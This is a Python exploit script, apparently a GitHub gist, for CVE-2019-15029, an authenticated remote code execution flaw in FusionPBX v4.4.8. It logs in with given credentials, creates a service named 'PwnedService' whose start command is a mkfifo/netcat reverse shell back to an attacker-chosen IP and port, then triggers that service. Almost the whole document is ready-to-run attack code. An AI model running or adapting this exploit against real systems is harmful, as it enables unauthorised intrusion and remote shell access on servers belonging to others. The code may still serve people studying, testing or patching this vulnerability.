#!/usr/bin/python3 | |
''' | |
# Exploit Title: FusionPBX v4.4.8 authenticated Remote Code Execution | |
# Date: 13/08/2019 | |
# Exploit Author: Askar (@mohammadaskar2) | |
# CVE : 2019-15029 | |
# Vendor Homepage: https://www.fusionpbx.com | |
# Software link: https://www.fusionpbx.com/download | |
# Version: v4.4.8 | |
# Tested on: Ubuntu 18.04 / PHP 7.2 | |
''' | |
import requests | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
import sys | |
import warnings | |
from bs4 import BeautifulSoup | |
# turn off BeautifulSoup and requests warnings | |
warnings.filterwarnings("ignore", category=UserWarning, module='bs4') | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
if len(sys.argv) != 6: | |
print(len(sys.argv)) | |
print("[~] Usage : ./FusionPBX-exploit.py url username password ip port") | |
print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337") | |
exit() | |
url = sys.argv[1] | |
username = sys.argv[2] | |
password = sys.argv[3] | |
ip = sys.argv[4] | |
port = sys.argv[5] | |
request = requests.session() | |
login_info = { | |
"username": username, | |
"password": password | |
} | |
login_request = request.post( | |
url+"/core/user_settings/user_dashboard.php", | |
login_info, verify=False | |
) | |
if "Invalid Username and/or Password" not in login_request.text: | |
print("[+] Logged In Sucssfully") | |
else: | |
print("[+] Error with creds") | |
service_edit_page = url + "/app/services/service_edit.php" | |
services_page = url + "/app/services/services.php" | |
payload_info = { | |
# the service name you want to create | |
"service_name":"PwnedService", | |
"service_type":"pid", | |
"service_data":"1", | |
# this value contains the payload , you can change it as you want | |
"service_cmd_start":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/f", | |
"service_cmd_stop":"stop", | |
"service_description":"desc", | |
"submit":"Save" | |
} | |
request.post(service_edit_page, payload_info, verify=False) | |
html_page = request.get(services_page, verify=False) | |
soup = BeautifulSoup(html_page.text, "lxml") | |
for a in soup.find_all(href=True): | |
if "PwnedService" in a: | |
sid = a["href"].split("=")[1] | |
break | |
service_page = url + "/app/services/services.php?id=" + sid + "&a=start" | |
print("[+] Triggering the exploit , check your netcat !") | |
request.get(service_page, verify=False) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Could you contact me on your